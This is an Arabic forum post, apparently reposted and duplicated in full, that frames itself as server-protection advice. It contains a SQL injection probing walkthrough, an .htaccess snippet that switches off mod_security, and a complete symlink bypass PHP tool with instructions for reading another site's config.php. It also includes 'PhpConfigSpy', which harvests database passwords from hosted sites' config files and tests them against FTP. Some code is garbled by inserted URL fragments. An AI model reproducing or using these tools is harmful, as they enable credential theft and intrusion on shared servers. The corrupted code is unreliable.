salima
11-02-2013, بتوقيت غرينيتش 01:17 AM
هذه خدمه لاصاحب السيرفر SERVERات العربيه
لقد تخصصت في مجال الهكر وعرفت كيفيه استغلال السيرفر SERVER بثغرات السيرفر SERVER وثغرات المواقع
وفي شركات قويه انصحك فيها مثل مربع وارا هوست والافضل حجز سيرفر SERVER خاص حتى لوماهو محمي
عادي انت ضامن ان موقعك مافيه ثغرات تمام ماحد جايك ؟
في الحقيقه السيرفر SERVERات العربيه في حاله يرثى عليها كل يوم مخترقينها وباذن الله سوف اخبرك ماهي حمايه سيرفر SERVERك
واذا تبون نصائح حتى لايخترق سيرفر SERVERك نصائح على الماشي
احذر تركب مجله جمله
احذر تركب مجله php-nuke
4images
قبل لاتركب سكربت الى موقعك اذهب الى هذا الموقع
www.milw0rm.com (http://www.milw0rm.com/)
وادخل الموقع واذهب الى بحث اعلى القائمه
واكتب اسم السكربت مثلا جملا تكتب
joomla
راح تحصل ثغرات بلغه البيرل والبي اتش بي والكثير من لغات البرمجه
طبعا
طبعا اذا في سكربت تريد فحصه بثغرات sql
www.xxxx.com/order.php=1 (http://www.xxxx.com/order.php=1)
تضيف التالي
'
يعني صار
www.xxxx.com/order.php=1 (http://www.xxxx.com/order.php=1)'
ويطلع لك الخطا
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in c:\appserv\www\***\***.php on line 47
www.xxxx.com/order.php?id=1 (http://www.xxxx.com/order.php?id=1) order by user()--
اذا حصلت سكربت مصاب جرب الامر اللي فوقك الامر شغال باكثر المواقع المصابه
طيب مثلا نحصل كذا
www.xxx.com/order.php?id=1cs1fdf4 (http://www.xxx.com/order.php?id=1cs1fdf4)
لاينفع .. مافيه ثغرات sql لانه رقمي وحروف
والثغرات sql فقط تعمل في الرقمي
اما الحرفي لايمكن مستحيل
وطبعا انا ملاحظ ان اكثر السيرفر SERVERات مسويه الطريقه تركب php 4 + php5 لا هذا اكبر غلط في ملف يرفعه ويستدعيه من المتصفح
ويتحول اصدار البي اتش بي الى 4 ؟ ومن ثم يتخطيه باسهل الطرق في الحقيقه php 5 الى الان ماحد تخطاه
والحل انك تحذف php 4 وتخلي php 5 او تركب php5 وتفعل السيف مود الوضع الامن تخليه فعال اذا لم يكن موجود اما بالنسبه لملف البيرل فهو خطير جدا جدا
اذا كان بالسيرفر SERVER شغال في الحقيقه في بعض اصحاب السيرفر SERVERات يمنعون البيرل لكن الطريقه ماتنفع يشغله بالطريقه التاليه
طبعا اذا اصدار البي اتش بي 5 عادي شغله اهم شي تفعل السيف مود وتعطل الدوال اللي راح اقولك اياها
ينشا ملف .htaccess داخل مجلد تصريح زي مارفع الشل يرفعه
ويضيف الكود code التالي
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
وعلى طول يشتغل البيرل داخل الصفحه طيب الحل انك تسوي حمايه صح لملفات هتاكس
في برامج للسيرفر SERVER حمايه رائعه تستطيع تركيب installها
طيب الان انا انصحك بتنفيذ هذه الطرق لحمايه سيرفر SERVERك
اول شي تعطيل الدوال التاليه
رمز Code:
dl,proc_open,proc_close,exec,system,cmd,backtick,e scapeshellarg,proc_nice,escapeshellcmd ,passthru,shell_exec,popen,virtual, show_source,pclose,pcntl_exec,symlink
طبعا حطها في سطر واحد
طيب ليش كل الدوال ؟ يعطل السكربتات لا ياخوي اقولك الداله هذه كلها خطيرها مره
طيب شلون خطيره ؟ في اكواد php يستعمل الداله في قراءه الملفات مثل كونفيج المنتدى forum
يستعملها في القراءه اللي هي داله symlink
طيب شرايك اعطيك ملف php تجربه على سيرفر SERVERك وتشوف كلامي صح ولا..
يالله انسخ الكود code التالي واحفظه باسم
sym2.php
انسخه كله وحطه داخل مستند نصي واحفظها باسم sym2.php
وانتم فاهمين ياصحاب السيرفر SERVER
رمز Code:
<title>[Symlink Tools to bypass user](Sniper_SA)</title> <body style="border-style: double; border-width: 3" bgcolor="#DADADA"> <form style="border: 4px ridge #FFFFFF"> <p align="center" dir="rtl"><font color="#FF0000"><span lang="ar-sa"><b> -=[Symlink Tools to bypass user]=- </b> </span></font></p> <p align="center" dir="rtl"><font color="#0066FF"><span lang="ar-sa"><b>SnIpEr_SA</b> </form> <div align=center id='n'><font face=tahoma size=2><b> <font color="#FFFFFF">o---[</font> <font color="#FF0000">Developer by SnIpEr_SA Symlink User Bypass </font> <font color="#FFFFFF">|</font> <a href=http://sniper-sa.com>http://sniper-sa.com</a> <font color="#FFFFFF">|</font> <font color="#FF0000"> <a href="mailto:SnIpEr.SAhttp://www.dzbatna.com/images/mail.gifhotmail.com" style="text-decoration: none"> <font color="#FF0000">SnIpEr.SAhttp://www.dzbatna.com/images/mail.gifhotmail.com</font></a></font><font color="#FFFFFF"> ]---o</font></b></font></div></td></tr></table> <form style="border: 4px ridge #FFFFFF"> <? echo ("<font color=#008000>my id user is : يوزرك</font>"); echo exec('id'); $dir = http://www.dzbatna.com/images/mail.gifgetcwd(); echo "<p>مسارك على السيرفر SERVER $dir</p>"; ?> </b></span></font></p> </form> <form style="border: 4px ridge #FFFFFF"> <p><b><td width="50%"><font color=#0066FF>you'r user:يوزرك</font></td></b></p> <td width="50%"><input type="text" name="sympy" value="you" size="15"></td> <p> <b> <td width="50%"><font color=#0066FF >anther site:يوزر الموقع الهدف</font></td> </b></p> <td width="50%"><input type="text" name="sympt" value="He" size="15"></td> <p> <b> <td width="50%"><font color=#0066FF>name folder:مسار المجلد الي انت فيه</font></td></b> </p> <td width="50%"><input type="text" name="folder" value="folder name" size="15"></td> <p> <b> <td width="50%"><font color=#0066FF>file or folder: الملف او المجلد المطلوب</font></td></b></p> <input type="text" name="c" value="name file or folder"> <tr> <td width="50%" colspan="2"> <p align="center"><input type="submit" value="Submit"></td> </tr> </form> <form style="border: 4px ridge #FFFFFF"> <td width="50%"><font color=red>users in server:قائمه اليوزرات بالسيرفر SERVER</font></td> <td width="50%"><select size=\"1\" name="plugin"><option value="plugin">/etc/passwd</option></option></select></td> <td width="100%" colspan="2"> <p align="center"><input type="submit" value="Submit"></td> </form> <form style="border: 4px ridge #FFFFFF"> <td width="50%"><font color=red>name sites with user: قائمه المواقع مع اسم يوزراتها</font></td> <td width="50%"><select size="1" name="alias"><option value="alias">/etc/valiases</option></option></select></td> <td width="100%" colspan="2"> <p align="center"><input type="submit" value="Submit"></td> </tr> </form> <textarea method='POST' rows=20 cols=100 wrap=off> <?php if ($_GET['alias'] ) system('ls -al /etc/valiases'); if ($_GET['plugin'] ) for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list ($key, $val) = each($ara)){ print "$val:"; } print "\n"; } } echo "
طيب بعد ماترفع sym2.php شتسوي شوف معاي الشرح طريقة
اول خانه
you'r user:يوزرك <== تحط يوزر الموقع اللي رافع عليه الملف
ثاني خانه
anther site:يوزر الموقع الهدف <== تحط يوزر الموقع اللي تبي تخترقه طبعا هو راح يقرا الكونفيج اذا فيه منتدى
name folder:مسار المجلد الي انت فيه <== مثلا انت رافع الملف sym2.php داخل مجلد vb ? تحط vb
file or folder: الملف او المجلد المطلوب<== تحط كذا المسار كذا مع التراجع ست مرات كذا
../../../../../../home/user/public_html/includes/config.php
تستبدل اليوزر الى يوزر الموقع اللي تبي تجرب عليه تصعط submit
طيب خلصنا؟؟؟؟ الحين وشف النتيجه حتى ولو صلاحيتك يوزر راح تظهر؟
طيب تمام طلع لنا ؟ طيب الحين انت تبي تقولي ؟ انك مفعل السيف مود ومايقدر يكتب اوامر؟ كيف؟
اقولك في ملف php يبحث لك مسارات الكونفيج والكونكيت انا ماراح اكثر كلام هذا الملف ارفعه وشف النتيجه
رمز Code:
<?php echo "<html>"; echo "<title>PhpConfigSpy v0.1</title><body>"; set_time_limit(0); ################## http://www.dzbatna.com/images/mail.gif$passwd=fopen('/etc/passwd','r'); if (!$passwd) { echo "[-] Error : coudn't read /etc/passwd"; exit; } $path_to_public=array(); $users=array(); $pathtoconf=array(); $i=0; while(!feof($passwd)) { $str=fgets($passwd); if ($i>35) { $pos=strpos($str,":"); $username=substr($str,0,$pos); $dirz="/home/$username/public_html/"; if (($username!="")) { if (is_readable($dirz)) { array_push($users,$username); array_push($path_to_public,$dirz); } } } $i++; } ################### ######################### echo "<br><br>"; echo "<textarea name='main_window' cols=100 rows=20>"; echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"; echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories\n"; echo "[~] Searching for passwords in config.* files...\n\n"; foreach ($users as $user) { $path="/home/$user/public_html/"; read_dir($path,$user); } echo "\n[+] Done\n"; function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath="$path$file"; if (($file!='.') and ($file!='..')) { if (is_readable($fpath)) { $dr="$fpath/"; if (is_dir($dr)) { read_dir($dr,$username); } else { if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) { $pass=get_pass($fpath); if ($pass!='') { echo "[+] $fpath\n$pass\n"; ftp_check($username,$pass); } } } } } } } } function get_pass($link) { http://www.dzbatna.com/images/mail.gif$config=fopen($link,'r'); while(!feof($config)) { $line=fgets($config); if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) { if (strrpos($line,'"')) $pass=substr($line,(strpos($line,'=')+3),(strrpos( $line,'"')-(strpos($line,'=')+3))); else $pass=substr($line,(strpos($line,'=')+3),(strrpos( $line,"'")-(strpos($line,'=')+3))); return $pass; } } } function ftp_check($login,$pass) { http://www.dzbatna.com/images/mail.gif$ftp=ftp_connect('127.0.0.1'); if ($ftp) { http://www.dzbatna.com/images/mail.gif$res=ftp_login($ftp,$login,$pass); if ($res) { echo '[FTP] '.$login.':'.$pass." Success\n"; } else ftp_quit($ftp); } } echo "
راح يطلع لك مسارات الكونفيج والملفات المهمه طبعا لو تعطل الدوال ماراح يقدر يسوي الدوال راح تحصلها تحت
واذا تبي تحمي سيرفر SERVERك شفر الملفات المهمه مثل كونفيج ببرنامج الانكوب والكثير يستغرب يقول ليش المنتديات العربيه ماتشفر
بالانكود code ؟ اقولك هذا بفلوس .. البرنامج $$
طبعا في ملف php يرفعها الداله مع المسار ويستطيع قراءته
طيب الكونفيج مغير مساره ماهو الحل؟ كيف يعرف؟
في طريقه تطلع اي كونفيج لو كان مكانه باي مكان يطلعه
طيب مشفر بالزند ؟ كيف يستطيع قراءته
اقولك الزند ينفك بخمس ثواني والدليل هنا
www.alm7ben.com/zend.html (http://www.alm7ben.com/zend.html)
طيب ماهو الحل ؟؟ الحل
تركيب install برنامج انكود code لتشفير الملفات وقوي البرنامج وتقدر تختار اي داله تشفر فيه
والحقيقه اكثر الاستضافات ماهي مركبته ولو طلبتها تركبه ؟ يردون عليك يقولون هذا البرنامج بفلوس؟
انصحك بتركيب installه وتشفير جميع الكونفيجات اللي بالمنتدى forum
طبعا انا ملاحظ انا الاختراقات بس المنتدى forum اما الرئيسيه لايستطيع
والسبب يقرا الكونفيج
طيب في حل للكونفيج الحين لاحصل الكونفيج وش يسوي على طول يضيفها
يرفع سكربت الاتصال بالقواعد وهو موجود وممكن انك تمنعه حسب خبرتك تمنع الاتصال بالقواعد
انا اعرف الحمايه قليل ولكن اذا عندك خبره امنع الاتصال بالقواعد وباذن الله محلوله
طبعا لو تمنعه في ملف اذكر توه نزل اتصال بالقواعد مشفر ببرنامج Base64
المهم شف لك حل
-----------------
اما سيرفر SERVERات ويندوز فهي خطيره حمايته ضعيفه جدا جدا
طبعا لو رفع الشل راح يخترق كل السيرفر SERVER بدون لوكال ولا اي شي مجرد اضافه يوزر بصلاحيت Administrator
يستطيع الاتصال من بعد ويدخل الجهاز ويعدل كل شي كأن الجهاز امامه
طيب تقول مانع الابلود ..ومايقدر يتصل لا في طريقه من البيرل يتصل باك كونكت من الدوس اتصال عكسي زي النت كات
طيب تقولي كيف الطريقه انصحك لاتحجز سيرفر SERVER وندوز وبس سيرفر SERVER الوندز اسهل الطرق يخترق بثغرات البفر اقلو والكثير الكثير
انصحك لاتحجزه الا اذا كان سيرفر SERVER خاص على موقع واحد وضامن الموقع مافيه ثغرات
---------------
واخير لو تسوون الطرق هذه والله اتحدى اطلق هكريسوي شي !
اول شي تعطيل الدوال اللي كتبتها فوق ؟
وثاني شي تفعل السيف مود والوضع الامن
وثالث شي تركب php 5 ماحد يقدر يتخطاه
وقبل لاتركبه لازم تمسح php4
طبعا زي ماقلت اكرر في ملف يستعديه يحوله من php 5 الى php 4 ويتخطاه
طبعا اخر نقطه انصحكم فيها تركب برنامج للسيرفر SERVER الانكوب وطبعا البرنامج
بفلوس وبكذا السيرفر SERVERات العربيه ماتركبه !! والانجليزيه تحصله راكب على طول
وانا نقلت يم استضافه انجليزيه عشان الانكوب طبعا بعد ماتركبه شفر جميع المنتدى forum اللي علي
سيرفر SERVERك
واخر نقطه مهمه وهي يسوونها الهكر اي الاطفال اللي طايحين في المنتديات العربيه
اول شي يطلع كل المواقع على السيرفر SERVER ويروح لمنتدى لمنتدى
وش يسوي طيب لادخل المنتدى forum يروح يضيف بعد
www.xxx.com/vb/bigdump.php (http://www.xxx.com/vb/bigdump.php)
طبعا اكيد عارفينه سكربت تركيب install القواعد وبكذا يقدر يلعب بالمنتدى forum ويرفع شل
وحاول انك تبحث بسيرفر SERVERك عن السكربت لان اكثر الي يركبون يخلونه ويجي الهكر يخمن
ويالله سلام عليكمممممممممممممممم
منقول للفائده
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©
لقد تخصصت في مجال الهكر وعرفت كيفيه استغلال السيرفر SERVER بثغرات السيرفر SERVER وثغرات المواقع
وفي شركات قويه انصحك فيها مثل مربع وارا هوست والافضل حجز سيرفر SERVER خاص حتى لوماهو محمي
عادي انت ضامن ان موقعك مافيه ثغرات تمام ماحد جايك ؟
في الحقيقه السيرفر SERVERات العربيه في حاله يرثى عليها كل يوم مخترقينها وباذن الله سوف اخبرك ماهي حمايه سيرفر SERVERك
واذا تبون نصائح حتى لايخترق سيرفر SERVERك نصائح على الماشي
احذر تركب مجله جمله
احذر تركب مجله php-nuke
4images
قبل لاتركب سكربت الى موقعك اذهب الى هذا الموقع
www.milw0rm.com (http://www.milw0rm.com/)
وادخل الموقع واذهب الى بحث اعلى القائمه
واكتب اسم السكربت مثلا جملا تكتب
joomla
راح تحصل ثغرات بلغه البيرل والبي اتش بي والكثير من لغات البرمجه
طبعا
طبعا اذا في سكربت تريد فحصه بثغرات sql
www.xxxx.com/order.php=1 (http://www.xxxx.com/order.php=1)
تضيف التالي
'
يعني صار
www.xxxx.com/order.php=1 (http://www.xxxx.com/order.php=1)'
ويطلع لك الخطا
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in c:\appserv\www\***\***.php on line 47
www.xxxx.com/order.php?id=1 (http://www.xxxx.com/order.php?id=1) order by user()--
اذا حصلت سكربت مصاب جرب الامر اللي فوقك الامر شغال باكثر المواقع المصابه
طيب مثلا نحصل كذا
www.xxx.com/order.php?id=1cs1fdf4 (http://www.xxx.com/order.php?id=1cs1fdf4)
لاينفع .. مافيه ثغرات sql لانه رقمي وحروف
والثغرات sql فقط تعمل في الرقمي
اما الحرفي لايمكن مستحيل
وطبعا انا ملاحظ ان اكثر السيرفر SERVERات مسويه الطريقه تركب php 4 + php5 لا هذا اكبر غلط في ملف يرفعه ويستدعيه من المتصفح
ويتحول اصدار البي اتش بي الى 4 ؟ ومن ثم يتخطيه باسهل الطرق في الحقيقه php 5 الى الان ماحد تخطاه
والحل انك تحذف php 4 وتخلي php 5 او تركب php5 وتفعل السيف مود الوضع الامن تخليه فعال اذا لم يكن موجود اما بالنسبه لملف البيرل فهو خطير جدا جدا
اذا كان بالسيرفر SERVER شغال في الحقيقه في بعض اصحاب السيرفر SERVERات يمنعون البيرل لكن الطريقه ماتنفع يشغله بالطريقه التاليه
طبعا اذا اصدار البي اتش بي 5 عادي شغله اهم شي تفعل السيف مود وتعطل الدوال اللي راح اقولك اياها
ينشا ملف .htaccess داخل مجلد تصريح زي مارفع الشل يرفعه
ويضيف الكود code التالي
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
وعلى طول يشتغل البيرل داخل الصفحه طيب الحل انك تسوي حمايه صح لملفات هتاكس
في برامج للسيرفر SERVER حمايه رائعه تستطيع تركيب installها
طيب الان انا انصحك بتنفيذ هذه الطرق لحمايه سيرفر SERVERك
اول شي تعطيل الدوال التاليه
رمز Code:
dl,proc_open,proc_close,exec,system,cmd,backtick,e scapeshellarg,proc_nice,escapeshellcmd ,passthru,shell_exec,popen,virtual, show_source,pclose,pcntl_exec,symlink
طبعا حطها في سطر واحد
طيب ليش كل الدوال ؟ يعطل السكربتات لا ياخوي اقولك الداله هذه كلها خطيرها مره
طيب شلون خطيره ؟ في اكواد php يستعمل الداله في قراءه الملفات مثل كونفيج المنتدى forum
يستعملها في القراءه اللي هي داله symlink
طيب شرايك اعطيك ملف php تجربه على سيرفر SERVERك وتشوف كلامي صح ولا..
يالله انسخ الكود code التالي واحفظه باسم
sym2.php
انسخه كله وحطه داخل مستند نصي واحفظها باسم sym2.php
وانتم فاهمين ياصحاب السيرفر SERVER
رمز Code:
<title>[Symlink Tools to bypass user](Sniper_SA)</title> <body style="border-style: double; border-width: 3" bgcolor="#DADADA"> <form style="border: 4px ridge #FFFFFF"> <p align="center" dir="rtl"><font color="#FF0000"><span lang="ar-sa"><b> -=[Symlink Tools to bypass user]=- </b> </span></font></p> <p align="center" dir="rtl"><font color="#0066FF"><span lang="ar-sa"><b>SnIpEr_SA</b> </form> <div align=center id='n'><font face=tahoma size=2><b> <font color="#FFFFFF">o---[</font> <font color="#FF0000">Developer by SnIpEr_SA Symlink User Bypass </font> <font color="#FFFFFF">|</font> <a href=http://sniper-sa.com>http://sniper-sa.com</a> <font color="#FFFFFF">|</font> <font color="#FF0000"> <a href="mailto:SnIpEr.SAhttp://www.dzbatna.com/images/mail.gifhotmail.com" style="text-decoration: none"> <font color="#FF0000">SnIpEr.SAhttp://www.dzbatna.com/images/mail.gifhotmail.com</font></a></font><font color="#FFFFFF"> ]---o</font></b></font></div></td></tr></table> <form style="border: 4px ridge #FFFFFF"> <? echo ("<font color=#008000>my id user is : يوزرك</font>"); echo exec('id'); $dir = http://www.dzbatna.com/images/mail.gifgetcwd(); echo "<p>مسارك على السيرفر SERVER $dir</p>"; ?> </b></span></font></p> </form> <form style="border: 4px ridge #FFFFFF"> <p><b><td width="50%"><font color=#0066FF>you'r user:يوزرك</font></td></b></p> <td width="50%"><input type="text" name="sympy" value="you" size="15"></td> <p> <b> <td width="50%"><font color=#0066FF >anther site:يوزر الموقع الهدف</font></td> </b></p> <td width="50%"><input type="text" name="sympt" value="He" size="15"></td> <p> <b> <td width="50%"><font color=#0066FF>name folder:مسار المجلد الي انت فيه</font></td></b> </p> <td width="50%"><input type="text" name="folder" value="folder name" size="15"></td> <p> <b> <td width="50%"><font color=#0066FF>file or folder: الملف او المجلد المطلوب</font></td></b></p> <input type="text" name="c" value="name file or folder"> <tr> <td width="50%" colspan="2"> <p align="center"><input type="submit" value="Submit"></td> </tr> </form> <form style="border: 4px ridge #FFFFFF"> <td width="50%"><font color=red>users in server:قائمه اليوزرات بالسيرفر SERVER</font></td> <td width="50%"><select size=\"1\" name="plugin"><option value="plugin">/etc/passwd</option></option></select></td> <td width="100%" colspan="2"> <p align="center"><input type="submit" value="Submit"></td> </form> <form style="border: 4px ridge #FFFFFF"> <td width="50%"><font color=red>name sites with user: قائمه المواقع مع اسم يوزراتها</font></td> <td width="50%"><select size="1" name="alias"><option value="alias">/etc/valiases</option></option></select></td> <td width="100%" colspan="2"> <p align="center"><input type="submit" value="Submit"></td> </tr> </form> <textarea method='POST' rows=20 cols=100 wrap=off> <?php if ($_GET['alias'] ) system('ls -al /etc/valiases'); if ($_GET['plugin'] ) for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list ($key, $val) = each($ara)){ print "$val:"; } print "\n"; } } echo "
طيب بعد ماترفع sym2.php شتسوي شوف معاي الشرح طريقة
اول خانه
you'r user:يوزرك <== تحط يوزر الموقع اللي رافع عليه الملف
ثاني خانه
anther site:يوزر الموقع الهدف <== تحط يوزر الموقع اللي تبي تخترقه طبعا هو راح يقرا الكونفيج اذا فيه منتدى
name folder:مسار المجلد الي انت فيه <== مثلا انت رافع الملف sym2.php داخل مجلد vb ? تحط vb
file or folder: الملف او المجلد المطلوب<== تحط كذا المسار كذا مع التراجع ست مرات كذا
../../../../../../home/user/public_html/includes/config.php
تستبدل اليوزر الى يوزر الموقع اللي تبي تجرب عليه تصعط submit
طيب خلصنا؟؟؟؟ الحين وشف النتيجه حتى ولو صلاحيتك يوزر راح تظهر؟
طيب تمام طلع لنا ؟ طيب الحين انت تبي تقولي ؟ انك مفعل السيف مود ومايقدر يكتب اوامر؟ كيف؟
اقولك في ملف php يبحث لك مسارات الكونفيج والكونكيت انا ماراح اكثر كلام هذا الملف ارفعه وشف النتيجه
رمز Code:
<?php echo "<html>"; echo "<title>PhpConfigSpy v0.1</title><body>"; set_time_limit(0); ################## http://www.dzbatna.com/images/mail.gif$passwd=fopen('/etc/passwd','r'); if (!$passwd) { echo "[-] Error : coudn't read /etc/passwd"; exit; } $path_to_public=array(); $users=array(); $pathtoconf=array(); $i=0; while(!feof($passwd)) { $str=fgets($passwd); if ($i>35) { $pos=strpos($str,":"); $username=substr($str,0,$pos); $dirz="/home/$username/public_html/"; if (($username!="")) { if (is_readable($dirz)) { array_push($users,$username); array_push($path_to_public,$dirz); } } } $i++; } ################### ######################### echo "<br><br>"; echo "<textarea name='main_window' cols=100 rows=20>"; echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"; echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories\n"; echo "[~] Searching for passwords in config.* files...\n\n"; foreach ($users as $user) { $path="/home/$user/public_html/"; read_dir($path,$user); } echo "\n[+] Done\n"; function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath="$path$file"; if (($file!='.') and ($file!='..')) { if (is_readable($fpath)) { $dr="$fpath/"; if (is_dir($dr)) { read_dir($dr,$username); } else { if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) { $pass=get_pass($fpath); if ($pass!='') { echo "[+] $fpath\n$pass\n"; ftp_check($username,$pass); } } } } } } } } function get_pass($link) { http://www.dzbatna.com/images/mail.gif$config=fopen($link,'r'); while(!feof($config)) { $line=fgets($config); if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) { if (strrpos($line,'"')) $pass=substr($line,(strpos($line,'=')+3),(strrpos( $line,'"')-(strpos($line,'=')+3))); else $pass=substr($line,(strpos($line,'=')+3),(strrpos( $line,"'")-(strpos($line,'=')+3))); return $pass; } } } function ftp_check($login,$pass) { http://www.dzbatna.com/images/mail.gif$ftp=ftp_connect('127.0.0.1'); if ($ftp) { http://www.dzbatna.com/images/mail.gif$res=ftp_login($ftp,$login,$pass); if ($res) { echo '[FTP] '.$login.':'.$pass." Success\n"; } else ftp_quit($ftp); } } echo "
راح يطلع لك مسارات الكونفيج والملفات المهمه طبعا لو تعطل الدوال ماراح يقدر يسوي الدوال راح تحصلها تحت
واذا تبي تحمي سيرفر SERVERك شفر الملفات المهمه مثل كونفيج ببرنامج الانكوب والكثير يستغرب يقول ليش المنتديات العربيه ماتشفر
بالانكود code ؟ اقولك هذا بفلوس .. البرنامج $$
طبعا في ملف php يرفعها الداله مع المسار ويستطيع قراءته
طيب الكونفيج مغير مساره ماهو الحل؟ كيف يعرف؟
في طريقه تطلع اي كونفيج لو كان مكانه باي مكان يطلعه
طيب مشفر بالزند ؟ كيف يستطيع قراءته
اقولك الزند ينفك بخمس ثواني والدليل هنا
www.alm7ben.com/zend.html (http://www.alm7ben.com/zend.html)
طيب ماهو الحل ؟؟ الحل
تركيب install برنامج انكود code لتشفير الملفات وقوي البرنامج وتقدر تختار اي داله تشفر فيه
والحقيقه اكثر الاستضافات ماهي مركبته ولو طلبتها تركبه ؟ يردون عليك يقولون هذا البرنامج بفلوس؟
انصحك بتركيب installه وتشفير جميع الكونفيجات اللي بالمنتدى forum
طبعا انا ملاحظ انا الاختراقات بس المنتدى forum اما الرئيسيه لايستطيع
والسبب يقرا الكونفيج
طيب في حل للكونفيج الحين لاحصل الكونفيج وش يسوي على طول يضيفها
يرفع سكربت الاتصال بالقواعد وهو موجود وممكن انك تمنعه حسب خبرتك تمنع الاتصال بالقواعد
انا اعرف الحمايه قليل ولكن اذا عندك خبره امنع الاتصال بالقواعد وباذن الله محلوله
طبعا لو تمنعه في ملف اذكر توه نزل اتصال بالقواعد مشفر ببرنامج Base64
المهم شف لك حل
-----------------
اما سيرفر SERVERات ويندوز فهي خطيره حمايته ضعيفه جدا جدا
طبعا لو رفع الشل راح يخترق كل السيرفر SERVER بدون لوكال ولا اي شي مجرد اضافه يوزر بصلاحيت Administrator
يستطيع الاتصال من بعد ويدخل الجهاز ويعدل كل شي كأن الجهاز امامه
طيب تقول مانع الابلود ..ومايقدر يتصل لا في طريقه من البيرل يتصل باك كونكت من الدوس اتصال عكسي زي النت كات
طيب تقولي كيف الطريقه انصحك لاتحجز سيرفر SERVER وندوز وبس سيرفر SERVER الوندز اسهل الطرق يخترق بثغرات البفر اقلو والكثير الكثير
انصحك لاتحجزه الا اذا كان سيرفر SERVER خاص على موقع واحد وضامن الموقع مافيه ثغرات
---------------
واخير لو تسوون الطرق هذه والله اتحدى اطلق هكريسوي شي !
اول شي تعطيل الدوال اللي كتبتها فوق ؟
وثاني شي تفعل السيف مود والوضع الامن
وثالث شي تركب php 5 ماحد يقدر يتخطاه
وقبل لاتركبه لازم تمسح php4
طبعا زي ماقلت اكرر في ملف يستعديه يحوله من php 5 الى php 4 ويتخطاه
طبعا اخر نقطه انصحكم فيها تركب برنامج للسيرفر SERVER الانكوب وطبعا البرنامج
بفلوس وبكذا السيرفر SERVERات العربيه ماتركبه !! والانجليزيه تحصله راكب على طول
وانا نقلت يم استضافه انجليزيه عشان الانكوب طبعا بعد ماتركبه شفر جميع المنتدى forum اللي علي
سيرفر SERVERك
واخر نقطه مهمه وهي يسوونها الهكر اي الاطفال اللي طايحين في المنتديات العربيه
اول شي يطلع كل المواقع على السيرفر SERVER ويروح لمنتدى لمنتدى
وش يسوي طيب لادخل المنتدى forum يروح يضيف بعد
www.xxx.com/vb/bigdump.php (http://www.xxx.com/vb/bigdump.php)
طبعا اكيد عارفينه سكربت تركيب install القواعد وبكذا يقدر يلعب بالمنتدى forum ويرفع شل
وحاول انك تبحث بسيرفر SERVERك عن السكربت لان اكثر الي يركبون يخلونه ويجي الهكر يخمن
ويالله سلام عليكمممممممممممممممم
منقول للفائده
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©
